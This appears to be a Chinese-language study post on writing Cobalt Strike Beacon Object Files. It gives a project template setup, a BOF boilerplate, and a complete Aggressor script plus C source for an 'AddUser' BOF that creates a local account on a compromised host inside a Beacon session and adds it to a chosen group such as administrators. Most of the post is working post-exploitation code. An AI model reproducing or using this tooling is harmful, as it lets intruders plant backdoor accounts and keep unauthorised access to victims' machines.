BOF探究学习
BOF 学习
Beacon Object File(BOF) 使用 C 语言编写扩展来扩展 Beacon 的功能。这些扩展可以在运行时直接加载到 Beacon 的内存中并执行,无需在目标机器的磁盘上创建任何文件
0x00 准备:
下载 Template
拷贝到 Visual-Studio 目录
%UserProfile%\Documents\Visual Studio 2022\Templates\ProjectTemplates
重启 VS
创建 BOF 项目
批处理生成 x64 和 x86 以及问题修改
直接编译报错生成后事件改为
xcopy /y "(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*"; powershell -ExecutionPolicy Unrestricted -command "& { . '(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }"语言万能开头
用字符串来表达#include "bofdefs.h" extern "C" { void go(char* buff, int len) { #ifdef BOF DFR_LOCAL(NETAPI32, DsGetDcNameA); DFR_LOCAL(NETAPI32, NetApiBufferFree); DFR_LOCAL(KERNEL32, WinExec); //add ... #endif BeaconPrintf(CALLBACK_OUTPUT, "The quieter you become, the more you are able to hear"); } } #ifndef BOF void main(int argc, char* argv[]) { go(NULL, 0); } #endif
0x01 落地
写几个程序
添加用户
描述:BOF 创建用户名
cna 代码
beacon_command_register( "AddUser", "add a administrator's user", "Synopsis: AddUser <groupname> <username> <password>"); alias AddUser{ local('$barch $handle $data $args'); $gname = $2; $uname = $3; $pass = $4; if ($uname eq "" or $pass eq "") { berror($1, "usage command: help AddUser"); return; } # Read in the right BOF file # figure out the arch of this session $barch = barch($1); # read in the right BOF file $handle = openf(script_resource("dist/AddUser-Bof. $+ $barch $+ .o")); $data = readb($handle, -1); closef($handle); # Pack our arguments $args = bof_pack($1, "ZZZ",$gname, $uname, $pass); beacon_inline_execute($1, $data, "go", $args); }BOF 代码
/************************************************************************** Copyright Copyright 2025 Google Inc. * File Name: Source.c * Description: 抱歉原有逻辑实在不忍直视,所以进行了略微更改,尊重原作者:https://github.com/0x3rhy/AddUser-Bof/blob/main/AddUser-Bof.c 增加组名考虑到需要远程桌面组,还需要再修改,于是改为变量传参 ^-^ * * Version: V1.0 * Author: 3inter * Create Time: 2025-05-28 **************************************************************************/ #include <windows.h> #include <stdio.h> #include <lm.h> #include "beacon.h" typedef DWORD NET_API_STATUS; DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD); DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD); void go(char* args, int len) { if (!BeaconIsAdmin()) { BeaconPrintf(CALLBACK_ERROR, "[!] You must be admin priv!"); return; } USER_INFO_1 UserInfo; DWORD dwLevel = 1; DWORD dwError = 0; wchar_t* GroupName; wchar_t* UserName; wchar_t* PassWord; datap parser; BeaconDataParse(&parser, args, len); GroupName = (wchar_t*)BeaconDataExtract(&parser, NULL); UserName = (wchar_t*)BeaconDataExtract(&parser, NULL); PassWord = (wchar_t*)BeaconDataExtract(&parser, NULL); if (UserName == NULL || PassWord == NULL) { BeaconPrintf(CALLBACK_ERROR, "[!] Invalid argument...\n"); return; } UserInfo.usri1_name = UserName; UserInfo.usri1_password = PassWord; UserInfo.usri1_priv = USER_PRIV_USER; UserInfo.usri1_home_dir = NULL; UserInfo.usri1_comment = NULL; UserInfo.usri1_flags = UF_SCRIPT; UserInfo.usri1_script_path = NULL; NET_API_STATUS dwStatus; dwStatus = NETAPI32$NetUserAdd( NULL, dwLevel, (LPBYTE)&UserInfo, &dwError ); do { if (!dwStatus == NERR_Success) { BeaconPrintf(CALLBACK_ERROR, "[!] User added Filed %d", dwStatus); break; } LOCALGROUP_MEMBERS_INFO_3 account = {0}; account.lgrmi3_domainandname = UserInfo.usri1_name; dwStatus = NETAPI32$NetLocalGroupAddMembers(NULL, GroupName, 3, (LPBYTE)&account, 1); if (!dwStatus == NERR_Success) { BeaconPrintf(CALLBACK_ERROR, "[!] User added Filed %d", dwStatus); break; } BeaconPrintf(CALLBACK_OUTPUT, "[*] username: %ls\n password: %ls\n", UserName, PassWord); BeaconPrintf(CALLBACK_OUTPUT, "[*] User %ls has been successfully added", UserName); } while (0); }待完成….
- ToDoList(实现再更)